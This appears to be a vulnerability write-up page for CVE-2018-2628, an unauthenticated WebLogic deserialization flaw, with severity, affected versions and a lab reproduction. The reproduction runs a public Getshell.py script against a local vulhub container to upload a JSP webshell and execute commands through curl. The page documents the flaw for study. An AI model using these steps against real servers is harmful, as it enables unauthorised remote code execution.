WebLogic — CVE-2018-2628

Updated 26 May 2026

Background

WebLogic WLS Core Components Deserialization RCE

CVSS
9.8—Critical
VECTOR
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
IMPACT
Remote code execution

AFFECTED
WebLogic≤ 10.3.6.0< CPU Apr 2018
WebLogic≤ 12.1.3.0< CPU Apr 2018
WebLogic≤ 12.2.1.2< CPU Apr 2018
WebLogic≤ 12.2.1.3< CPU Apr 2018

An unauthenticated deserialization vulnerability in Oracle WebLogic's WLS Core Components. A remote attacker can send a crafted serialized Java object over the T3 protocol to execute arbitrary code on the server.

Reproduction

POC || GTFO

Exploitable using jas502n's CVE-2018-2628-Getshell.py. The uploaded webshell is one-time-use — it is removed after executing a command.

Tested against VulnHub's weblogic:10.3.6.0-2017:

zsh

docker container ls
CONTAINER ID   IMAGE                             COMMAND              CREATED       STATUS
f3b474a990a1   vulhub/weblogic:10.3.6.0-2017    "startWebLogic.sh"   5 hours ago   Up 5 hours

Upload webshell

zsh

python2.7 CVE-2018-2628-Getshell.py 127.0.0.1 7003 shell1.jsp
>>>Shell File Upload Dir:  servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell1.jsp
>>>Getshell: http://127.0.0.1:7003/bea_wls_internal/shell1.jsp?tom=d2hvYW1pCg==

Execute command

zsh

curl http://127.0.0.1:7003/bea_wls_internal/shell1.jsp\?tom\=aG9zdG5hbWU\=
->|vuln-weblogic
|<-%

Running CVE-2018-2628-Getshell.py

References

WebLogic — CVE-2018-2628

WebLogic WLS Core Components Deserialization RCE

POC || GTFO

Further reading